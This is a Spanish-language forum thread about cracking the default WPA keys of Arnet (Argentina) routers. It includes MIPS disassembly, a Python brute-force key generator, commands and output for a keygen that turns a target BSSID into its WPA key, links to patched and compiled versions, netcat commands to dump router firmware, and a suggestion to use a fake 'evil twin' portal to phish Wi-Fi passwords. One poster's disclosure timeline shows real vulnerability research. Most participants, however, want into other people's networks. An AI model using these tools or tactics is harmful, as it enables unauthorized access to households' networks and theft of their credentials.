sw      $v0, 0xC8+var_90($fp)
li      $v0, 0xB
sw      $v0, 0xC8+var_90($fp)
addiu   $v0, $fp, 0xC8+var_90
la      $a0, key
move    $a1, $v0
lw      $a2, 0xC8+arg_0($fp)
la      $v0, 0xA0000
addiu   $a3, $v0, (a1236790 - 0xA0000)  # "1236790"
la      $v0, generateKey
move    $t9, $v0
jalr    $t9 ; generateKey
nop
lw      $gp, 0xC8+var_B0($fp)
la      $v0, 0xA0000
addiu   $a0, $v0, (aGeneratekey - 0xA0000)  # "generateKey"
la      $v0, puts
move    $t9, $v0
jalr    $t9 ; puts
nop
lw      $gp, 0xC8+var_B0($fp)
lw      $v0, 0xC8+var_90($fp)
la      $a0, passphrase
la      $a1, key
move    $a2, $v0
la      $v0, createWPAPassphraseFromKey
move    $t9, $v0
jalr    $t9 ; createWPAPassphraseFromKey
nop
lw      $gp, 0xC8+var_B0($fp)
la      $v0, 0xA0000
addiu   $v0, (aPassphraseSIdx - 0xA0000)  # "PassPhrase=%s ,idx=%d\n"
move    $a0, $v0
la      $a1, passphrase
lw      $a2, 0xC8+arg_0($fp)
la      $v0, printf
move    $t9, $v0
jalr    $t9 ; printf
nop
lw      $gp, 0xC8+var_B0($fp)
sw      $zero, 0xC8+var_98($fp)
b       loc_1E
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 04 de Agosto de 2014, 11:52:16 pm
hola que datos se te puede pasar para ayudar, che desics q se puede hackear esos routers?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 05 de Agosto de 2014, 01:03:31 pm
mac, wpa, serial number y una foto de la pegatina trasera donde van los datos no estaría mal tampoco.

Todo por privado.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 05 de Agosto de 2014, 09:22:04 pm
hola te puedo pasar un par de claves pero no tngo adceso a las fotos del router si te sirve
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 06 de Agosto de 2014, 03:08:08 am
Mandarme lo que podais.  ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 09 de Agosto de 2014, 07:39:29 pm
Durante meses estuve juntando datos de los routers de Arnet.
Estas son todas las fotos de los routers adb broadband que pude conseguir.
Espero que te sean útiles 2kW79@32WEYS.

Saludos.

(http://www.subeimagenes.com/img/0184-1052237.jpg)

(http://www.subeimagenes.com/img/1453-1052183.jpg)

(http://www.subeimagenes.com/img/2337-1052186.jpg)

(http://www.subeimagenes.com/img/2529-1052190.jpg)

(http://www.subeimagenes.com/img/3435-1052194.jpg)

(http://www.subeimagenes.com/img/5189-1052198.jpg)

(http://www.subeimagenes.com/img/6325-1052201.jpg)

(http://www.subeimagenes.com/img/8217-1052202.jpg)

NOTA: Para colocar imágenes solamente pegar la Url en tamaño completo, automáticamente se achicara y trabajara con el visualizador. Ejemplo:

Código: [Seleccionar]
[img]http://www.subeimagenes.com/img/8217-1052202.jpg[/img]
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Agosto de 2014, 11:14:17 pm
Perfecto christian. Me valen para poder empezar a probar.

Gracias.

p.s.- Avisarme si alguein se anima al reversing
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 17 de Agosto de 2014, 12:40:44 am
Qué laburo viejo!!!. Me voy a poner las pilas también para sacarle fotos a todos los ADB de Arnet que ne cruce, lo prometo. Espero que se pueda hacer algo... :(
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 19 de Agosto de 2014, 09:58:22 pm
 :) buenas a todos! he encontrado este post y he decidido aportar... estuve buscando y preguntando entre amigos y no he encontrado una relacion entre mac ssid y contraseña asi que no me ha quedado otra que fuerza bruta... al intentarlo con jhon the ripper o crunch me di cuenta que la generacion de keys no era apropiada y muy lenta... porque si inicia con el 1111111111a y tiene que llegar a la mitad lleva mucho tiempo asi que cree un script en python para hacer la generacion de keys mas aleatoria.... siguiendo algunos criterios en este post han puesto...

Código: [Seleccionar]
#!/usr/bin/env python

from sys import exit
from random import choice, randint


longitudl = 6
longitudn = 4
letrasmin = "abcdefghijklmnopqrstuvwxyz"
letrasmay = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
numeros = "0123456789"
longitud = longitudl + longitudn
valores1 = numeros + letrasmin
valores2 = numeros + letrasmay
valores3 = numeros + letrasmay + letrasmin

def mezclaCadena(cadena):
   nuevaCadena=""
   posicionesUtilizadas=[];
   while len(posicionesUtilizadas)<len(cadena):
       aleatorio=randint(0,len(cadena)-1)
       if not aleatorio in posicionesUtilizadas:
           posicionesUtilizadas.append(aleatorio)
           nuevaCadena+=cadena[aleatorio]
   return nuevaCadena

def generar2():
  c=0
  while (c < 1):
   part1 = ""
   part2 = ""
   part3 = ""
   p = ""
   part1 = p.join([choice(letrasmin) for i in range(longitudl)])
   p = ""
   part2 = p.join([choice(numeros) for i in range(longitudn)])
   p = ""
   part3 = mezclaCadena(part2+part1)
   print part3

def generar():
  c=0
  while (c < 1):
   p = ""
   p = p.join([choice(valores2) for i in range(longitud)])
   print p

def salir():
  exit()   

if __name__ == '__main__':
  generar2()
  salir()

Este codigo permite generar dos tipo de keys ya sea completamente aleatoria sin ninguna especificacion o siguiendo la regla de los 4 numeros y 6 letras...
hasta el momento he intentado haciendo 40millones de keys eso me lleva 10 horas! probe aleatorio completo con minusculas y numeros, con mayusculas y numeros, y ahora con el metodo de las 4-6... sigue siendo incierto saber si aparecera o no... ni si la key esta mas a lla de los 40milones o no! aca les dejo una captura de lo que estoy haciendo...
(http://www.***/i/140820025621903643.png)
Espero que les sirva...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Septiembre de 2014, 10:36:03 am
¿Alguien con el router fisicamente?  Necesitaría saber si este fichero "/var/hwaddr"  contiene la misma BSSID que aparece en la pegatina


La manera mas sencilla es conectar via telnet y listar el fichero con cat
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 12:17:38 pm
Hola 2kW79@32WEYS!!  :) mira, estoy adentro del router ahora mismo! y como admin no veo ese archivo! como te has logueado? con que usuario y contraseña? estoy intentado ver los archivos cgi de la carpeta webs y aun nada! porque? porque mi teoria es que la generacion de claves esta dentro del mismo router asi que los cgi contendrian o el algoritmo o la pista de donde esta esos archivos...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 12:22:11 pm
perdon ya encontre el archivo que mencionaste y te cuento que si, la mac de br0 es la bssid del wifi  :) ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 11 de Septiembre de 2014, 03:05:11 pm
que onda con este hilo?? hay progreso o no hay progreso?? vienen complicaditas las wifi arnet parece jajaja.

saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 03:28:24 pm
Hola 2kW79@32WEYS!!  :) mira, estoy adentro del router ahora mismo! y como admin no veo ese archivo! como te has logueado? con que usuario y contraseña? estoy intentado ver los archivos cgi de la carpeta webs y aun nada! porque? porque mi teoria es que la generacion de claves esta dentro del mismo router asi que los cgi contendrian o el algoritmo o la pista de donde esta esos archivos...

Como os digo que yo no tengo acceso al router y no soy de Argentina, pero he mirado el firmware y tengo el algoritmo despellejado. Hay una semilla en formato bytearray de longitud 32, la mac esta invuelta tambien. Ahora queda confirmado que es la macwifi. En otro firmware de un router de otro pais encontre la semilla con el disasembler, pero con este router no la veo por ningun lado. Tiene que estar, tengo la memory address donde se localiza.

Voy algo mal de tiempo, vamos que lo hago por diversión. Asi que poco a poco, y primero lo que va primero :)

El algoritmo es sha256(semilla de 32 bytes+ ????+ macwifi 6 bytes)  y luego hay una conversion con este charset en la funcion bin2ascii
 "0123456789abcdefghijklmnopqrstuvwxyz"

El algoritmo esta ahi, aun falta descifrar el argumento del medio, parece ser el serial. Pero he de jugar un poco y debuggear un rato y lleva tiempo. Al final saldrá!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 03:33:19 pm
Acabo de encontrar la semilla  secreta 8)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 04:07:30 pm
 :)  :) ???  ::)  :-*  :-*  :-* cuanteeeeeeeeeee
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 04:15:51 pm
hay cambios y parece diferente pero creo que se puede!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 04:18:12 pm
conta...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 04:20:52 pm
mira tus privados
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 11 de Septiembre de 2014, 05:24:46 pm
y viejo lograste encontrar algo?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 11 de Septiembre de 2014, 08:10:03 pm
mira tus privados

Matarias lo pongas en publico a ver si  con tu ayuda podemos aportar algo....
Soy novato igual pero me doy maña y me gustan los problemas.

Abrazo
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 12 de Septiembre de 2014, 06:44:11 am
Aun investigando.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 14 de Septiembre de 2014, 01:19:21 pm
 ;D Wooow Grande GENIOS !!! Se acerca el final... :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 14 de Septiembre de 2014, 05:48:37 pm
 ;D hola gente... mi opinion es que el algoritmo esta dentro del router pero a saber... existen varios usuarios y el usuario admin no puede ser esos archivos, creo que el ausuario support si los podria ver pero no he econtrado la manera de acceder como tal... alguien sabe que pass puede ser?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 27 de Noviembre de 2014, 01:45:31 am
hola encontre una alternativa es un programa llamado linset que lo trae el wifislax en su version 4.9 con este software se puede hacer una falsa red en donde el usuario tiene que poner su contraseña funciona yo lo probe,tngo un pedido quien tnga conocimiento en php ay que modificar la interfas que trae el software en donde ponen la contraseña es una pagina web habria que hacer parecida a la interfas que usa arnet para configurar sus modem, por ahi si alguin se anima a hacerlo
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 27 de Noviembre de 2014, 03:57:58 pm
hola encontre una alternativa es un programa llamado linset que lo trae el wifislax en su version 4.9 con este software se puede hacer una falsa red en donde el usuario tiene que poner su contraseña funciona yo lo probe,tngo un pedido quien tnga conocimiento en php ay que modificar la interfas que trae el software en donde ponen la contraseña es una pagina web habria que hacer parecida a la interfas que usa arnet para configurar sus modem, por ahi si alguin se anima a hacerlo

si yo tambien probe ese programa y funciona pocas veces... por un lado esta el cambio ese q hablas para hacerlo mas creible y por el otro lado no funciona al intentar cargar pag simples del tipo google, facebook, hotmail, gmail... (todas del tipo https)... todas paginas tipicas q la gente normalmente intenta entrar y en las cuales el programa no funciona (el portal cautivo no carga)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 28 de Noviembre de 2014, 01:14:28 am
si yo tambien probe ese programa y funciona pocas veces... por un lado esta el cambio ese q hablas para hacerlo mas creible y por el otro lado no funciona al intentar cargar pag simples del tipo google, facebook, hotmail, gmail... (todas del tipo https)... todas paginas tipicas q la gente normalmente intenta entrar y en las cuales el programa no funciona (el portal cautivo no carga)
gracias por contestar, si la verdad que habria que probar hacer lo mas parecida a la paginas de arnet yo estube leyendo que se puede modificar el scrip del programa pero ni  idea como se hace por ahi que pueda hacer ese laburo sera bueno, yo que estube notando que la mayoria de la gente entra al face o a whatsapp si se modifica el portal cautivo podria se mas creible
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 06 de Diciembre de 2014, 02:31:41 am
 8) Estoy en la tarea, les cuento... me baje un supuesto firmware del router, lo decompile en linux, me fui a la carpeta webs y alli analilze el codigo fuente del archivo wlsecurity.html y dentro de el hay este fragmento de codgio interensate
Citar
Código: [Seleccionar]
<!-- hide
var syncNvram = '<%ejGetWl(wlSyncNvram)%>';
var ssidIdx = '<%ejGetWl(wlSsidIdx)%>';
var enblWireless = '<%ejGetWl(wlEnbl_wl0v0)%>';
var radiusServerIP = '<%ejGetWl(wlRadiusServerIP)%>';
var mode = '<%ejGetWl(wlAuthMode)%>';
var bit = '<%ejGetWl(wlKeyBit)%>';
var keyIdx = '<%ejGetWl(wlKeyIndex)%>';
var keys = new Array( "<%ejGetWl(wlKey1)%>", "<%ejGetWl(wlKey2)%>",
                      "<%ejGetWl(wlKey3)%>", "<%ejGetWl(wlKey4)%>" );
var wpaPskKey = '<%ejGetWl(wlWpaPsk)%>';
Buscando sobre que significaba <%ejGetWl( encontre que un codigo enbebido del mismisimo httpd entonces para corroborar esto use ida pro y desensamble el archivo httpd alli encontre el nombre de cada funcion que aparece en este html y en otros.. asi que es por alli donde empezar a buscar el algoritmo que genera las claves por defecto de los router o por lo menos esa es mi teoria... quien se quiera sumar me avisa que necesito ayuda  ;D
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 07 de Diciembre de 2014, 09:28:17 pm
@pantersxx3 Somos varios los que estamos analizando los algoritmos de estos routers  ;) desde mi parte estoy buscando por telnet dentro del busybox..
Respecto a lo que encontraste no es nada revelador, simplemente son unas declaraciones de variables que de todas maneras se agradece por compartir.
La clave es encontrar la función que transforma la Mac en una WPA.

PD:  Gente de Mexico descubrió dicha función en routers Huawei HG5XX
http://websec.ca/blog/view/mac2wepkey_huawei

Estoy seguro que para 2015 tendremos el algoritmo de Arnet en nuestras manos..

Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 08 de Diciembre de 2014, 08:22:59 am
 ;) ya lo se estimado! solo lo puse como punto de partida! tambien estoy con el tema del telnet y el busybox... la onda es ver que mas podemos hacer en conjunto...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 09 de Diciembre de 2014, 04:30:58 pm
 8) sin querer segui el mismo camino que un compañero antes posteo... lo puso en assembler pero no me di cuenta... solo que el nose que mas estaba haciendo... pero esta dentro de una libreria privada.. me esta costando entender el assembler mips nomas
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 27 de Diciembre de 2014, 12:50:22 pm
Me llegó el modem nuevo de arnet, un ADB 2210, una mugre atomica que no me deja sincronizar 10 mb ni a palos.

(http://www.hapshack.com/images/EDJZQ.jpg)

Y me había prestado un conocido un hermoso Zyxel 660 que anda bastante mejor, incluso me sincroniza más alto.

(http://www.hapshack.com/images/6UqgC.jpg)

Descarga de ambas imagenes (http://ge.tt/316qyX72/v/0?c) (por si se cae el host)

Espero que a alguien le sea útil esa info.
Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 02 de Enero de 2015, 05:38:53 pm
Otro zyxel p660 que me prestaron hoy:

(http://www.hapshack.com/images/aMh1H.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 03 de Enero de 2015, 03:19:20 am
Gran aporte @badder, por el momento no le encontré nada posible..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 05 de Enero de 2015, 07:33:19 pm
Acabo de liberar el algoritmo de Pirelli Arnet, espero que la compañia solucione los problemas causados.

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina
http://ednolo.alumnos.upv.es/?p=1883

Citar
*Timeline    :
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 06 de Enero de 2015, 10:57:18 am
disculpa mi ignorancia,se puede hace un ejecutable del algoritmo?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 06 de Enero de 2015, 10:51:20 pm
disculpa mi ignorancia,se puede hace un ejecutable del algoritmo?

En un terminal:

Código: [Seleccionar]
$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ cd adbpirelli
$ python wifiarnet.py

Desde wifislax podes lanzarlo perfectamente, en windows creo que si tenes instalado python tendría que andar también.

Uso:

Código: [Seleccionar]
$ python wifiarnet.py -v
wifiarnet.py 1.0 [2014-09-11] ----> http://www.ednolo.alumnos.upv.es


$ python wifiarnet.py
usage: wifiarnet.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli
are likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable targets (essid Wifi-Arnet-XXXX)

required:
  -b [BSSID], --bssid [BSSID]
                    Target mac address

(+) Help: python wifiarnet.py -b 74:88:8B:AD:C0:DE


$ python wifiarnet.py -l
[+] Possible vulnerable targets so far:
     bssid: 00:08:27:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:13:C8:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:17:C2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:19:3E:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:1C:A2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:1D:8B:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:22:33:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:8C:54:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 30:39:F2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 74:88:8B:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 84:26:15:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: A4:52:6F:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: A4:5D:A1:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: D0:D4:12:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: D4:D1:84:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: DC:0B:1A:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: F0:84:2F:XX:XX:XX    essid: Wifi-Arnet-XXXX


$ python wifiarnet.py -b 74:88:8B:AD:C0:DE
[+] SSID    : Wifi-Arnet-XXXX
[+] MAC     : 74:88:8B:AD:C0:DE
[+] WPA key : hj0wl2c2r7

y ya hay aplicación para Android:

http://www.youtube.com/watch?v=8UXB6rmvwzU

http://wpamagickey.blogspot.com.ar/
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 07 de Enero de 2015, 07:37:15 pm

gracias por la ayuda lo acabo de probar y lamentablemente la clave que me tiro es incorrecta le probe en un modem pirelli modelo pdg a4001n software pdg_tar_4.06L.02.2813  y la clave es P9VRfW3EYVYFh estuve mirando y estan viniendo con claves de 13 caracteres
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 07 de Enero de 2015, 11:36:36 pm
Fijaste que si pones -l te da las MAC Address compatibles, por ejemplo las que logro ver:

9C:D2:4B ZTE CORPORATION
08:7A:4C Huawei Technologies Co., Ltd
28:28:5D ZyXEL Communications Corporation
F0:84:2F ADB Broadband Italia
64:2D:AB -no se sabe-
A4:52:6F ADB Broadband Italia
FC:F5:28 ZyXEL Communications Corporation
4C:AC:25 -no se sabe-
B4:82:FE Askey Computer Corp

Las Compatibles:

Código: [Seleccionar]
00:08:27
00:13:C8
00:17:C2
00:19:3E
00:1C:A2
00:1D:8B
00:22:33
00:8C:54
30:39:F2
74:88:8B
84:26:15
A4:52:6F
A4:5D:A1
D0:D4:12
D4:D1:84
DC:0B:1A
F0:84:2F
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 08 de Enero de 2015, 01:29:31 am
hola probe con un router que trae por la mac F0:84:2F aparece ultima en la lista esa lista y me dice que la contraseña es incorrecta  :( vos verificaste alguna? @D3M0N
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 08 de Enero de 2015, 10:42:17 pm
Lamentablemente las tengo bastante lejos las redes como para lograr una conexion, pero segun las imágenes que tenemos en el hilo pude verificar las siguientes MAC Address:

Código: [Seleccionar]
00:8C:54:XX:XX:XX
74:88:8B:XX:XX:XX
D4:D1:84:XX:XX:XX

En si la lista es a base del fabricante:

Código: [Seleccionar]
00-08-27
00-13-C8
00-17-C2
00-19-3E
00-1C-A2
00-1D-8B
00-22-33
00-8C-54
30-39-F2
74-88-8B
84-26-15
A4-52-6F
A4-5D-A1
D0-D4-12
D4-D1-84
DC-0B-1A
F0-84-2F

Puedes verla en: http://www.mac-address.info/ADB%20Broadband%20Italia
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 09 de Enero de 2015, 04:35:23 pm
hola probe con un router que trae por la mac F0:84:2F aparece ultima en la lista esa lista y me dice que la contraseña es incorrecta  :( vos verificaste alguna? @D3M0N

¡Hola, amigos! Si la clave que les da es incorrecta prueben a editar esta parte del código:

Código: [Seleccionar]
mac = bytearray.fromhex('%012x' %(int(mac_str,16) +1))

Y déjenla así:

Código: [Seleccionar]
mac = bytearray.fromhex('%012x' %(int(mac_str,16)))

Lo comprobé con dos router y funciona perfecto...
Pruebenlo, obviamente si la MAC es compatible.
Hice correr el script en Windows instalando Python, aunque fue un poquito más complejo que solo instalarlo. Corranlo desde Wifislax, anda genial y no tienen que instalar nada.

Saludos y espero les sirva!! :D

Si no saben como editarlo o no se dan cuenta, acá lo tienen ya editado:
https://mega.co.nz/#!xBIQBCoL!7Q73F3qrqBD3qrs3cXNiZpt74CfjHhtg4AZchWGNmuE
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Enero de 2015, 05:25:09 am
@Nicash: Perfecto! a probar se ha dicho! igual modifique el Script para que de los dos posibles keys directamente:

(http://i.minus.com/iAmxEhRQT2CaI.png)

Script: http://arg-wireless.com.ar/Arnet-Archivos/arnetwpa.py (http://arg-wireless.com.ar/Arnet-Archivos/arnetwpa.py)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Enero de 2015, 10:20:42 am
¿Solo pasa con esa MAC? Yo probe la lista de la pagina 8 y funcionaba en todos los casos.
Porfavor mandarme un mail con los detalles y cuando pueda lo modificare y asi estara actualizado
en Wifislax tambien. Si quereis commitear un pull-request y mirare el codigo.

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 10 de Enero de 2015, 01:21:59 pm
¿Solo pasa con esa MAC? Yo probe la lista de la pagina 8 y funcionaba en todos los casos.
Porfavor mandarme un mail con los detalles y cuando pueda lo modificare y asi estara actualizado
en Wifislax tambien. Si quereis commitear un pull-request y mirare el codigo.

Saludos

Para mi el problema está en que las etiquetas no muestran la MAC real del router. Por lo que si usamos un scanner de redes y usamos esa MAC con el script original no nos va a funcionar, porque la MAC real es +1 de lo que figura en la etiqueta.
El algoritmo calcula correctamente el password para la MAC de la etiqueta, pero si no tenemos acceso físico al router tendremos que modificarle esa linea de código que dije para obtener el password.

Aquí dejo de ejemplo el router al que tengo acceso físico:

(http://i.minus.com/igCwby9obsjus.jpg)

(http://i.minus.com/i5zaUni0eEgrY.jpg)

¡Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 10 de Enero de 2015, 01:35:25 pm
@2kW79@32WEYS,@Nicash,@D3M0N  son unos grosos funciona probe con una y funka de maravilla, una consulta me tope con un modem de arnet estos dias de la marca zyxel modelo p-600hnu tlv2 lo raro es que trae una clave predeterminada de 13 caracteres alfanumericos mayusculas y minusculas un ejemplo de estea es: P9VRfW3EYVYFh se podria usar este algoritmo para que tratar de desencriptar estas claves?


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Enero de 2015, 02:33:45 pm
@ matt_1210: Me puedes pasar o un firmware de ese Zyxel o un router fisico?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Enero de 2015, 04:24:08 pm
Compilado para windows: http://www.arg-wireless.com.ar/Arnet-Archivos/arnet-wpa-exe.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/arnet-wpa-exe.rar)

uso:

Código: [Seleccionar]
arnetwpa.exe -b MAC

desde una consola.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Enero de 2015, 04:28:28 pm
D3m0n hay una nueva version en el repositorio. Podiais probar esa?
Si haces un binario con py2exe estaria genial. Gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 10 de Enero de 2015, 06:46:30 pm
@2kW79@32WEYS: che no tengo ni  idea como te puedo pasar el firmware,alguien que me pueda guiar
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Enero de 2015, 09:53:56 pm
@2kW79@32WEYS: v1.1 http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.1.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.1.rar)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2015, 06:07:21 pm
@matt_1210: me pregunte lo mismo y encontré un programa que se llama: teleport pro (http://files.tenmax.com/Teleport_Pro_Installer.exe) que lo que hace es extraer toda la interfaz web del router.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 11 de Enero de 2015, 07:49:28 pm
@matt_1210: me pregunte lo mismo y encontré un programa que se llama: teleport pro (http://files.tenmax.com/Teleport_Pro_Installer.exe) que lo que hace es extraer toda la interfaz web del router.

gracias viejo voy a ver si puedo extraer algo de info
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Enero de 2015, 07:51:07 pm
Una forma es mirar si existe netcat, sino crosscompilarlo para MIPS o buscar uno compilado.

Desde el router :
Código: [Seleccionar]
cat /dev/mtdblock[0-5]  | nc -l -p 6666
Desde un PC:     
Código: [Seleccionar]
nc IProuter 6666 > firmware.bin


Otra seria mirar si teneis SSH y usar SCP. Hay muchas maneras, dependiendo del privilegio que tengas. Sino desoldando memoria y leyendola.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2015, 07:55:46 pm
Recién me apareció una de las redes que tengo de un Zte que saque gracias a que tenia WPS activo,

Archivos WebServer:
Config. Basico Arnet: http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-basica-arnet.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-basica-arnet.rar)
Config. Avanzado Zte: http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-avanzada.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-avanzada.rar)

Más info: http://arg-wireless.com.ar/index.php?topic=1006.msg5876#msg5876 (http://arg-wireless.com.ar/index.php?topic=1006.msg5876#msg5876)

Ahora veo de sacar el firmware, eso se haría desde un terminal o cmd?

@2kW79@32WEYS: tiene Telnet, no tiene SSH y tampoco se puede activar.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2015, 08:26:02 pm
ESSID: WiFi-Arnet-??XX (?? = Minusculas - XX = Mayusculas)
BSSID: B4:B3:62
Marca: ZTE Corporations
Software Versión: ZTE ZXHN H108N V3.0.00_TAT26
Hardware Versión: 96328avng
Boot Loader Version: 1.0.37-106.24
Serial Number: b4b3626d877b

Info: http://arg-wireless.com.ar/index.php?topic=1006.msg6013#msg6013 (http://arg-wireless.com.ar/index.php?topic=1006.msg6013#msg6013)

Firmware: http://www.arg-wireless.com.ar/Arnet-Archivos/H108N_V3.0.00_TAT26.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/H108N_V3.0.00_TAT26.rar)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 11 de Enero de 2015, 08:48:59 pm
Muy guenas a todos !!

Mas firmwares y mas datos buenos sobre ADB Pirelli. Please.

WPAmagicket.blogspot.com

http://www.youtube.com/watch?v=8UXB6rmvwzU
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 12 de Enero de 2015, 12:23:26 am
@buckynet: sin APK no hay paraíso..  :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 12 de Enero de 2015, 02:24:57 am
felicitaciones son unos grosos las de arnet q parecian infranqueables le dieron su merecido!! lastima q solo salen las de los comtrend y solo unos modelos ahora hay q ir a por mas jejeje y si ya sacan el algoritmo de las de fibertel les hacemos un monumento jaja saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
